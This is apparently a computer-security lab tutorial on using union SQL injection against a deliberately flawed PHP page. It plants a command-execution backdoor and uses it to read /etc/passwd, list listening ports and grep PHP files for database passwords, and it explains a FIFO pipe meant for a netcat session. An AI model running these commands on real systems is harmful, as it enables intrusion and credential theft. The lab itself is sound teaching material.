SQL injection (also known as SQL fishing) is a
technique often used to attack data driven applications.

This is done by including portions of SQL
statements in an entry field in an attempt to get the website to pass a
newly formed rogue SQL command to the database (e.g., dump the database
contents to the attacker). SQL injection is a code injection technique that
exploits a security vulnerability in an application's software.

The vulnerability happens when user input is
either incorrectly filtered for string literal escape characters embedded in
SQL statements or user input is not strongly typed and unexpectedly
executed. SQL injection is mostly known as an attack vector for websites but
can be used to attack any type of SQL database.

What is Netcat?

Netcat is a computer networking service for
reading from and writing to network connections using TCP or UDP. Netcat is
designed to be a dependable "back-end" device that can be used directly or
easily driven by other programs and scripts. At the same time, it is a
feature-rich network debugging and investigation tool, since it can produce
almost any kind of correlation you would need and has a number of built-in
capabilities. Netcat is often referred to as a "Swiss-army knife for
TCP/IP".

Due to a purposeful bug in the user-info.php
code, we will use a Union SQL Injection to create a PHP script that
allows any user to execute commands local on the webserver.

We will obtain database credentials.

We will create a netcat session using
the execute_command.php backdoor script.

We will obtain pretend credit card
information.

Legal Disclaimer

As a condition of your use of this Web
site, you warrant to computersecuritystudent.com that you will not use
this Web site for any purpose that is unlawful or
that is prohibited by these terms, conditions, and notices.

In accordance with UCC § 2-316, this
product is provided with "no warranties, either express or implied." The
information contained is provided "as-is", with "no guarantee of
merchantability."

In addition, this is a teaching website
that does not condone malicious behavior of
any kind.

You are on notice, that continuing
and/or using this lab outside your "own" test environment
is considered
malicious and is against the law.

Instead of letting brutessh attempt
default usernames, now you can direct a potential attack at the
student user.

Exploring /etc/passwd

Instructions:

cat /etc/passwd

Click the Execute Command Button

Notes (FYI):

/etc/passwd file stores essential
information, which is required during login. The /etc/passwd
file contains the following fields: Username, Password
Existance, User ID, Group ID, Gecos, Home Directory, and Shell.

Notice that mail, ftp, apache, ssh and
mysql are all located in the /etc/passwd file.

Network Reconnaissance

Instructions:

netstat -nao | grep "0.0.0.0:"

Click the Execute Command Button

Notes (FYI):

3306 - MySQL

22 - SSH

25 - SMTP (Mail)

631 - Internet Print Protocol

Section 11: Using
the Backdoor for Database Reconnaissance

Database Reconnaissance

Instructions:

find * -name "*.php" | xargs grep -i
"password" | grep "="

Click the Execute Command Button

Notes (FYI):

Find all files that end with a .php
that contains the string
password
AND the string
=.

Display PHP Script File

Instructions:

cat classes/MySQLHandler.php | grep -v
"<?php"

Click the Execute Command Button

Notes (FYI):

In order to display a PHP script as a
text file, you must remove the starting "<?php" tag. If you do
not remove the tag, then the web server will try to run the script
instead of displaying the contents.

Make a FIFO
named pipe. A FIFO special file (a named pipe) is similar to a
pipe, except that it is accessed as part of the file system. It can
be opened by multiple processes for reading or writing. When
processes are exchanging data via the FIFO, the kernel passes all
data internally without writing it to the file system. Thus, the
FIFO special file has no contents on the file system, the file
system entry merely serves as a reference point so that processes
can access the pipe using a name in the file system.

Pipes allow separate processes to
communicate without having been designed explicitly to work
together.